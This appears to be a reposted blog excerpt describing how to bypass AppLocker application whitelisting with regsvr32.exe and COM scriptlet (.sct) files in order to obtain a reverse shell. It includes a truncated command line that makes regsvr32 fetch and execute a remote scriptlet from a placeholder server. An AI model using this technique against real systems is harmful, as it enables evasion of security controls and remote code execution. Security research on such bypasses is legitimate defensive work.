Bypass Application Whitelisting Script Protections – Regsvr32.exe & COM Scriptlets (.sct files)

So, I have been working this out the last few days. I was trying solve a particular problem. I needed a reverse shell on workstation locked down by AppLocker executable and script rules enforced. tl;dr “regsvr32 /s /n /u /i:http://server/file.sct scrobj.

from Pocket http://subt0x10.blogspot.se/2016/04/bypass-application-whitelisting-script.html
via IFTTT

0

1 Comment